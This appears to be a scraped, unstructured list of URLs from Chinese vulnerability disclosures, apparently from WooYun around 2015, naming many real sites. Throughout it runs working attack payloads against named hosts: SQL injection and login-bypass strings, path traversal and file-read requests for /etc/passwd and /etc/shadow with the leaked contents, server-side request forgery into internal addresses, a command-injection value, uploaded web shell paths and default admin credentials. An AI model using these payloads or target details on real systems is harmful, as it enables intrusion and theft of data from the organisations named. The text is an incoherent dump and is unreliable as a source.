http://**.**.**.**:8089 http://**.**.**.**:8089/ http://finechem.sysu.edu.cn/foot.aspx?cate=g3 http://finechem.sysu.edu.cn/foot.aspx?cate=g3 
http://finechem.sysu.edu.cn/foot.aspx?cate=g3 http://jump.im.baidu.com/jump.html?imver=4%2C7%2C1%2C2&langid=2052&goid=101&url=https%3A%2F%2Fpassport%2Ebaidu%2Ecom%2Flogm%3Ftpl%3Dhi%26cv%3D0%26cert%5Fid%3D1%26id%3D%25C2%25F4%25C3%25C8%25B5%25C4%25D6%25D0%25B6%25FE%26t%3D1439778839%26sauth%3Duo7tR6ysIo5%252Fvh%252FiF7ZSbJHTLa%252FnCgJmVUasw0NgXSHnRVKgwdRt7t7Mvj%252B6V6hCwmc%252BVTLSXXO2vydtVPPT0bOSFjQrtt3qgCEj6xc5vu54E5JyS6IzkT1sk6qRYB89qpXpN3NYwQ3OzX1Ew6ME%252FQcBzPQy0lKDlYQ1Yj4kt1U%253D%26u%3Dhttp%253A%252F%252Fhi%252Ebaidu%252Ecom%252Fsys%252Freg%253Fpspref%253Dimclient&loginid=%C2%F4%C3%C8%B5%C4%D6%D0%B6%FE&p=19000 https://reg.hexun.com/bindbaidu.aspx?gourl=aHR0cDovL2hleHVuLmNvbS9uZXdob21lL3NldC9vcGVuaWQ=&fromhost=hexun.com https://reg.hexun.com/bindbaidu.aspx?gourl=11111111111111111111111111111111111=&fromhost=hexun.com http://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=x0jcd8PuoDCCrxGDxfmdaXRZ&redirect_uri=http://reg.hexun.com/bindBaidu.aspx&scope=super_msg&display=page&state=aHR0cDovL2hleHVuLmNvbS9uZXdob21lL3NldC9vcGVuaWQjLS0tI2hleHVuLmNvbSMtLS0jIy0tLSMjLS0tIw== http://m.tianhong.cn/member/member_update_address.html?addressId=50110641&isShow=Y http://m.tianhong.cn/member/member_update_address.html?addressId=50160641&isShow=Y http://**.**.**.**/product.php?CID=1&ID=18 http://blog.chukong-inc.com/wp-login.php http://tms.tianhong.cn:8877/ http://tms.tianhong.cn:8877/orderSearchAction.do?method=searchOrder&index=1# http://tms.tianhong.cn:8877/orderSearchAction.do?method=getDetail&txlogisticid=231764813501 http://tms.airchinaf.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://tms.airchinaf.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**/bugs/wooyun-2015-0108778而发 http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= 
http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/chanpinz/p/1 https://**.**.**.**/succour/leicaproxy/blob/31bd1d19bc1a6c653778f451e03fb0b433b00bdf/src/main/java/com/royal/dealer/web/tools/mail/MailTest.java http://gsv.muzhiwan.com/ http://www.58.com/jk/ http://www.58.com/jk/index.php?admin_main http://m.58.ufstone.net:8014/jk/ http://www.58.com/jk/dbCenter/ http://www.pywm.com.cn/fund_net_product---act--detail__product_id--42*.html ip:60.28.230.77 http://**.**.**.**/Site/Index http://**.**.**.**/ http://**.**.**.**/manage/login.aspx https://www.yuancredit.com/ http://radm.chanjet.com http://125.35.5.144:81/fixsys/Default.aspx http://law.tencent.com:88/www/phpmyadmin/index.php http://law.tencent.com:88/www/phpinfo.php http://drops.wooyun.org/papers/3771 http://suggestion.baidu.com/su;/1.bat?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 http://60.shisu.edu.cn/category.php?cid=7 
http://**.**.**.**/.svn/entries http://zhanzhang.baidu.com http://admin.lingd.com/vote_show.php?pollid=9 http://**.**.**.**/web/index.php http://**.**.**.**:89 http://www.1314hua.cn/ http://www.xianglixiang1314.com/ http://www.1314ya.com/ site:xianglixiang1314.com以下……太多了 http://www.1314hua.cn/UserCenter_OrderListRecent.aspx?OrderId=1%27%20or%20OrderId%3E%272013 http://www.1314hua.cn/UserCenter_OrderListRecent.aspx?OrderId=1 www.1314hua.cn https://github.com/feiniu7903/feiniu_pet/blob/781d571b8e663ce0c5a98b556a11c1638e22990a/pet/pet_search/src/main/java/com/lvmama/search/util/mail/MyAuthenticator.java http://**.**.**.**/InformationView.aspx?InfoCode=-1 http://**.**.**.**/pub/news.asp?ctyp=NEWS&catid=1747&ctxid=535525 http://rsc.bjedu.gov.cn/search.jsp?range=titleandcontent%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&keywords=1 http://**.**.**.**/registration/registInit.action http://www.183read.com/user/login/index http://www.183read.com http://whois.chinaz.com/lcy8.cc http://wooyun.org/bugs/wooyun-2014-080099 http://pan.baidu.com/s/1bn37KOR http://wooyun.org/bugs/wooyun-2010-080099 http://easytoyou.eu http://admin.imtoutiao.com/index.php?m=admin&c=index&a=login http://site.hiall.com.cn/.git/config http://**.**.**.**/login.asp http://comment2.rayli.com.cn/list_comment.php?callback=jQuery17206805726147171625_1439794384634&datepath=2015-06-29&news_id=4100546&nid=&ctype=3&is_sign=2'&_=1439794386674 http://comment2.rayli.com.cn/pageTag.php?callback=jQuery17206805726147171625_1439794384635&datepath=2015-06-29&news_id=4100546&page=1&ctype=3&is_sign=2'&_=1439794386675 http://yxjwc.sysu.edu.cn/preview_news.php?id=3054 http://whois.aliyun.com/whois/domain/lcy8.cc?spm=5334.7477273.3.1 http://**.**.**.**/index.php?m=content&c=index&a=annotation_new_window&ann_id=9 http://**.**.**.**//Investor_AnnouncementDetail.aspx?id=401 https://www.sunfobank.com/ http://exam.chanjet.com/discuz/admin.php http://exam.chanjet.com/discuz/uc_server 
http://www.xiaozufan.com/ http://zgc.xiaozufan.com/Index/orderToday admin.php/hr/hrlist_edit_submit http://zhaopin.now.cn/ http://ie.115.com/site2/static/js/theme.js http://**.**.**.**/ajaxserve/IndexSaleAjax.aspx?name= http://**.**.**.**/ajaxserve/IndexSaleAjax http://**.**.**.** http://price.ziroom.com/?_p=../../../../../../../../../../ http://xtoa.lbex.net/msg/pages/message_unread.aspx http://xtoa.lbex.net/index.aspx http://xtoa.lbex.net/msg/pages/message_unread.aspx http://121.41.28.105:8001 http://mail.ele.me/ https://office.elenet.me:5757/remote/login http://eoc.elenet.me/ http://**.**.**/ http://**.**.** http://**.**.**/index.php http://172.16.10.25:8081/sso/login?from=http://eve-hr.eleme.test#login http://**.**.**/account/loginnext=%2F http://**.**.**.**/ http://www.183read.com/vote/index_1.html www.183read.com http://www.183read.com http://**.**.**.**/bugs/wooyun-2015-095292 http://**.**.**.**/Item/16631.aspx bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:Daemon:/sbin:/bin/bash gdm:x:107:112:Gnome daemon:/var/lib/gdm:/bin/false haldaemon:x:101:102:User haldaemon:/var/run/hald:/bin/false mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash messagebus:x:100:101:User D-Bus:/var/run/dbus:/bin/false ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false oracle:x:108:113:Oracle user:/opt/oracle:/bin/bash polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false root:x:0:0:root:/root:/bin/bash sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false uuidd:x:102:104:User uuidd:/var/run/uuidd:/bin/false wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false educard:x:1001:113::/mhome/educard:/bin/bash trmsvc:x:1002:113::/mhome/trmsvc:/bin/bash tcomm:x:1003:100::/mhome/tcomm:/bin/bash oratrmudp2:x:1004:113::/mhome/oratrmudp2:/bin/bash 
educnt:x:1005:113::/mhome/educnt:/bin/bash clamav:x:1006:1000:Clam AntiVirus:/home/clamav:/bin/false trmtst:x:1007:113::/mhome/trmtst:/bin/bash http://60.174.64.196:7001/defaultroot/login.jsp http://wap.jjwxc.net http://www.chinawufeng.com/cold.php?pid=13 http://www.chinawufeng.com/fast.php?pid=25 http://**.**.**.**/visitor/index.action http://**.**.**.**/app/member/resetPwd.action?content=%7B%22password%22%3A%22123456%22%2C%22passwords%22%3A%22123456%22%2C%22loginName%22%3A%2213925668935%22%7D https://**.**.**.**/by_mail http://**.**.**.**/ www.sme999.org http://www.sme999.org/initzj.action http://www.sme999.org/wooyun.txt http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://www.yiqi1717.com https://itunes.apple.com/cn/app/yi-qi-tong-cheng-dan-shen/id991612683?mt=8 http://voice.cug.edu.cn:8086/gov/index.asp http://voice.cug.edu.cn:8086全都是注入点,在这里只举各别例子 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://agpsd.3g-elec.com:8080/app/public/S10APP/findLastPosition?did={devid}&did_id={did}&language=zhCN http://mis.998.com/GreenTreeInn/Login.aspx http://mis.998.com:8065/Construct_List_New.aspx http://mis.998.com:8065/upfiles/635754391703993832wooyun.aspx http://www.zzbank.cn http://www.8852.com/Page/Article.aspx?aid=645 http://shop.8852.com/a.asp http://kelinmef.sysu.edu.cn/ http://kelinmef.sysu.edu.cn/admin/login.html http://job.neu.edu.cn/ http://**.**.**.**/inforesult.aspx?typeid=%B9%AB%BD%BB%B9%AB%CA%BE&articleid=7273 http://video.happigo.com/index.html http://www.kingcms.com/download/k9/ http://www.focuznet.com/k9/t3012/  http://**.**.**.**/webfront/index.php/myapp/myapp http://**.**.**.**/webfront/index.php/appshelf 
http://**.**.**.**/webfront/index.php/appshelf http://**.**.**.**/webfront/index.php/appshelf http://**.**.**.**/search http://**.**.**.**/admin/ http://**.**.**.**/BaoMing/BMLogin.aspx http://**.**.**.**/Sundries/getstudentno.aspx www.ganji.com http://xxx/SysFun/UploadPic.htm http://bc.jlslgy.com/ http://sp.jlslgy.com/ http://sy.jlslgy.com/ http://th.jlslgy.com/ http://yb.jlslgy.com/ http://bs.jlslgy.com/ http://cb.jlslgy.com/ http://ly.jlslgy.com/ http://jn.gwbnsd.com/siteserver/forgetPassword.aspx http://jn.gwbnsd.com/siteserver/login.aspx http://jn.gwbnsd.com/upload/files/2015/8/181037223.aspx http://eip.crcchem.com:89/login.do http://cpac.sysu.edu.cn/index.php/article/more/id/6*.html http://www.h-h.com.cn/manage/default.aspx http://www.h-h.com.cn/manage/default.aspx http://218.241.201.153 http://**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://www.c-ps.net/ http://ibs.c-ps.net/login/forgot.html http://115.com/?mode=jianli http://www.sootoo.com/content/650379.shtml) http://t.jzt.58.com/weixinorder/cancelorder?orderid=633276032211906560 http://www.coremail.cn:80/label/ajax/hit.aspx http://webmail.xinnet.com xinnet.com/idc-service@xinnet.com http://**.**.**/ http://**.**.**.**/admin/pub_newschannel.asp?chid=100231 http://**.**.**.**/admin/pub_newschannel.asp?chid=100231 https://**.**.**.**/svpn/index.cgi http://www.txcards.com.cn/default.aspx?stype=1&key=a http://m.tuanyanwang.com/event.php?id=4* http://**.**.**.**:81 http://**.**.**.**:81/hbxxfb/Childpage/tztginfo.aspx?Pid=d691ecae-42ce-4999-b360-d46982a15dff http://www.ellechina.com/ellechina.tar.gz http://oa.bestv.com.cn http://oa.bestv.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 http://zhuanti.club.news.sohu.com/user_webpage/webpage_checkview.php?webid=13274 
http://zhuanti.club.news.sohu.com/user_webpage/webpage_checkview.php?webid=13274%20and%201=1 http://zhuanti.club.news.sohu.com/user_webpage/webpage_checkview.php?webid=13274%20and%201=2 http://106.37.197.38:2808/106admin https://115.29.37.36/upload.jsp(疑似上传) http://**.**.**.**/ http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://202.108.98.96/civilMessage/login.action http://202.108.98.96/civilMessage/ma.jsp http://202.108.98.96/civilMessage/shell.jsp http://**.**.**.** http://**.**.**.**/web/contact.aspx?code=14011&bcode=1401&scode=14011 http://**.**.**.**/web/EListTP.aspx?Code=3051&bcode=1202&scode=12026&type=game http://**.**.**.**/web/EListTP.aspx?Code=3051&bcode=1202&scode=12026&type=game http://www.cqaipu666.com/news/index.php?catid=0&key=a&imageField.x=31&imageField.y=10 http://sap.karra.com.cn/Account/PwdChange.aspx http://**.**.**.**/index.aspx)是昆山政府旗下唯一人才网: http://**.**.**.**/index.aspx http://**.**.**.**/New_View.aspx?action=view&type=2&infoid=43 www.go.cn http://oa.52mf.cn http://oa.52mf.cn/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1 http://sina.xiaozufan.com/Account_Service/findPwdPage http://about.ifensi.com/news_info.php?id=136040 http://baolai.hz.letv.com/php/videonum.php?callback=1&id=1 http://220.248.49.149:8080 admin:admin123 http://kuwo.cn/#酷我主站的登陆框,没有任何登陆验证机制 http://oa.52mf.cn:89/login.do http://**.**.**/NewPortal/index.aspx http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/index.aspx_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/ http://en.todaynic.com/email/email_admin.php 
http://**.**.**.**/cjfc/login/fc_login.jsp?kslbdmCurrent=01&ksqCurrent=1504&zcqCurrent=152%20kslbdmCurrent=01 http://**.**.**.**/cjfc/login/fc_login.jsp?kslbdmCurrent=01&ksqCurrent=1504&zcqCurrent=152%20kslbdmCurrent=01 http://admin.feipiao.cn/mygroupon/index.php http://**.**.**.**/ http://itse.dcits.com/top/system/login.do http://58.18.38.116:7001/cicms/login http://oa.tongji.edu.cn:89 http://weichat.skyworth.com/ http://www.2177s.com/ajax.asp?content=aaa%2527,convert%28int,system_user%29,1%29%20--;&h=saveWeituo&recuser=38180268 http://203.130.41.34/users/sign_in http://203.130.41.34/dealer_infos/180 http://cmc.sysu.edu.cn/ http://222.200.173.172/fckeditor/editor/fckeditor.htm http://www.ahedu.gov.cn/search?option=all&searchtype=shbs&querycode=1427768180 http://www.ahedu.gov.cn/search?option=all&searchtype=shbs&querycode=1427768180 xmlns:content="http://purl.org/rss/1.0/modules/content/ xmlns:wfw="http://wellformedweb.org/CommentAPI/ http://nesc.cn/ubsiServlet?xml= file:///etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/cdrom:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin 
saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin home:x:500:0::/home/home:/bin/bash abc:x:501:501::/home/abc:/bin/bash nba:x:502:502::/home/nba:/bin/bash http://jiaolian.51yund.com/ask/search?search=1 http://jiaolian.51yund.com/find/video?search=1 http://jiaolian.51yund.com/find/search?search=1 http://jiaolian.51yund.com/video/moreVideo/id/****/category_id/**** user:admin pwd:12345 https://github.com/chuckpu/BIAdmin/blob/25f80c8d1190da1be960f3cc968d852dda3b883f/src/com/changhong/admin/model/MailSend.java http://www.ymatou.com/ http://xt.brc.com.cn:8098/admin-console/login.seam Struts2:http://xt.brc.com.cn:8098/xt/logout.do XAMPP:http://app.brc.com.cn:8010/xampp/ http://**.**.**.**/chzwfw/main_goMain.do http://www.dfzq.com.cn/ubsiServlet?xml= file:///etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin 
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin http://**.**.**.**/xsguanzhu/index_show.dsn http://**.**.**.**/Guide/GuideDetail.aspx?module=4213&id=289 http://www1.ahedu.gov.cn/xinli/more.asp?NClass_Id=1 http://licai.iqianjin.com:88/uc_server/admin.php?m=user&a=login http://**.**.**.**/outweb-sbk/pages/login.jsp http://changyan.kuaizhan.com/login这个接口是搜狐畅言的登陆接口,登陆地方没有验证码限制 http://changyan.kuaizhan.com/detail/socia,说是引入社交平台的人气与流量的 http://oa.tongji.edu.cn/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 saps.sysu.edu.cn/search.asp post:keywords=1&Submit=%CB%D1+%CB%F7 http://202.116.74.202/detail.php?id=3378403 http://oa.21cn.com/messager/users.data http://taxi.qhfeidi.com/ http://www.crsdyy.com/sdgs/index.asp?buid=3701000110 https://myvip.gacfiatauto.com:8088/ http://leads.gacfiatauto.com http://www.sfea.com.cn/newsdetail.php?cid=232 http://cdn.5kcrm.com/Uploads/v0.5.1.zip http://183.221.33.85:8082/ http://www4.ahedu.gov.cn/ahedu2009/bszx/more.asp?sclass_id=1&Nclass_id=34 http://**.**.**.**/Customer/RetrievePassword.aspx http://my.shouliwang.com/MyAccount/MyAccountAjax.asmx/SaveAddress http://12345.my.gov.cn/myportal/pages/systemmanager/LoginSystemManager/authenticateByAccountPwd.do http://218.89.178.79:8020/my12345/pages/systemmanager/LoginSystemManager/loginoutByAccount.do http://218.89.178.79 http://www4.ahedu.gov.cn/ahedu2009//wmhd/zixun.asp?id=20 http://**.**.**.**/phpmyadmin/index.php http://222.240.193.170:8080/probiz/login.html 
http://218.28.233.118/acc/bindipmac/static_arp_action.php?arpIf=1%27 http://zhuanti.ahedu.gov.cn/xsyyc/more.asp?nClass_Id=1 http://zhuanti.ahedu.gov.cn/xsyyc/show.asp?id=126 http://zhuanti.ahedu.gov.cn/18da/show.asp?id=289 http://zhuanti.ahedu.gov.cn/2011jsj/more.asp?NClass_Id=1 http://zhuanti.ahedu.gov.cn/xfjs/more.asp?nClass_Id=1 http://zhuanti.ahedu.gov.cn/xfjs/show.asp?id=62 http://zhuanti.ahedu.gov.cn/ddcjx/show.asp?id=118 http://zhuanti.ahedu.gov.cn/lf/more.asp?nClass_Id=1 http://zhuanti.ahedu.gov.cn/xsyyc/more.asp?nClass_Id=1 http://www.openits.cn/ http://www.openits.cn/news.php?nid=1 http://its.sysu.edu.cn/在同一台服务器上,所以为中山大学的无误 http://**.**.**.**/web/yjy?id=38 http://210.72.226.39:12345/ site:jufangbian.com http://www1.ahedu.gov.cn/tzzx/vote/votedy.asp?id=1 http://119.167.156.251/fp4006/main.jsp http://www.bmie.neu.edu.cn/main/search?key=88952 http://www.bmie.neu.edu.cn/main/search?key=88952 http://sqlmap.org http://hq.fruitday.com:1300/test/ http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17 http://shop.innos.com/snsshop_admin/ http://www.ztegota.com.cn/ http://www.ztegota.com.cn/service/feedback.html http://**.**.**.**/Newspaper/PageNavigate.aspx?nid=1572 http://school.ahedu.gov.cn/schoollist.asp?sid=3415 http://school.ahedu.gov.cn/schoollist.asp?sid=3415 http://cart.suning.com/webapp/wcs/stores/servlet/SNMobileSaveCardAndCoupons http://**.**.**.**/showtpnews.php?id=239%27 http://**.**.**.**/cmswebuser/getRegFormList.do?now=2015-08-18+22%3A23%3A48.453 URL:http://**.**.**.**:80/cmswebuser/getRegFormList.do?&sql_name=1&sql_obligee=&sql_num=&sql_startDate=&sql_endDate=&curPage=1&count=10&sortOrder=desc&sortLabel=createDate 
http://**.**.**.**/wap/index.html http://**.**.**.**/jcontent.asp?id=128239 http://account.alicall.com/user/register.html http://love.mingdao.com/ www.xinmaochuangtou.com http://218.17.205.68:9090/home.jsp http://**.**.**.** http://**.**.**.**/Member/Login.aspx?exit=true http://**.**.**.**/ http://202.104.150.185/admin/overlook.php http://202.104.150.185/app/ https://222.223.213.36 http://202.120.189.131/ http://**.**.**.** http://115.238.68.245/ http://smart.sohu.com/downloads/sms?mobile_num=1 http://**.**.**.**/WFManager/login.jsp http://demo.ourphp.net/?cn-product-23.html=&type=a http://www.moko.cc/forgetPassword%7CupdatePhonePwd.action http://202.120.189.178/checklogin.asp postdata:usernamein=admin&passwordin='or%201=1-- http://**.**.**.**/onews.asp?id=210 http://**.**.**.**/onews.asp?id=210这个注入点 http://**.**.**.**/department/xkjsfzc/OtherView.asp?Id=33 http://**.**.**.**/NewsList.asp?classtwo=31 http://**.**.**.**/web/notice.jsp?id=80存在注入漏洞,参数id http://202.120.189.171/register http://sps.sysu.edu.cn/zsyx/content.asp?c=72&m=624&n=1330&todo=showinfo http://luyou.360.cn/activity/downLoadImg.php?url=https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superplus/img/logo_white.png&filetype=jpg&filename=360ProductSpecificationp-p1 http://luyou.360.cn/activity/downLoadImg.php?url=http://navsite.adsys.qihoo.net/?logo_white.png&filetype=jpg&filename=360ProductSpecificationp-p1 http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://10.121.95.65/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1 http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://10.121.95.65/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1 http://topic.muzhiwan.com/common/loginin/ http://sqlmap.org http://**.**.**.**/ http://**.**.**.**/index.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/网站的网上充值功能 http://www.sex-study.org/ www.sex-study.org/news.php?sort=1&isweb=1 
http://msite.now.cn/ admin.php/themes/opt http://www.xbiao.com/app/showarticle/id/33042 http://www.xbiao.com/app/showarticle/id/33042* http://**.**.**.**:18090/wcc/,一样拿到shell。 http://ichtf.dbw.cn/ltd/product/product.php?id=4395 http://sn.whut.edu.cn/NewsDetail.aspx?infoId=1024 http://sn.whut.edu.cn/Admin/LoginAdmin.aspx http://www.masrcb.com/ http://www.masrcb.com/batch.common.php?action=modelquote&cid=2&name=members http://www.ymatou.com http://**.**.**.**/Users/Main/Search.aspx?campusCategoryId=1 http://new.edong.com/handler/shoppingcart/shoppingcart.ashx?action=AddHostShopping&buytype=2&dbspace=0&dbspaceproductid=0&languageid=0&lineid=0&period=0&periodtype=0&price=0&productid=0"a=0"aproductid=0&traffic=0&trafficproductid=0&typeid=0 http://new.edong.com:80/ http://poiop.sankuai.com/apply/duplicate?poiIds=6586722 https://101.71.254.218/cgi-bin/welcome http://oa.conbagroup.com:7791/ http://meijiamei.xiaozufan.com/meijiamei.zip http://www.lurongdai.com http://202.108.6.102/api/roll.php?callback=foo&dir1=102&dir2=303&dir3=303,304&length=10&page=1&subid=1432 http://www.lurongdai.com http://wx.yzdsb.com.cn/注册一账号,在这个页面进行测试。 http://product.biketo.com/ http://product.biketo.com/search.php?chid=101&shiherenqun=1&caid=3&ccid5=644&chejialeixing=1 http://**.**.**.**/web/ZxZx.aspx?Item_id=162 http://www.crcxf.com/ http://quan.sohu.com/login?urlto=%2Fuserpost%2Flink这个是搜狐旗下的一个站点,登陆的地方没有做验证码限制 http://its.zte.com.cn/univ/ cn:32770 http://www.xbiao.com/app/BrandIntro/t/android/bid/22 http://**.**.**.**/Default.asp http://**.**.**.**/default.asp http://**.**.**.**/bugs/wooyun-2010-0106928 http://**.**.**.**/bugs/wooyun-2010-088386 http://**.**.**.**/bugs/wooyun-2010-077177 http://**.**.**.**/bugs/wooyun-2010-077165 http://**.**.**.** https://github.com/JohnCny/oa/tree/1b6578d650546b489fd73d5afa577f4dbe9bb123 
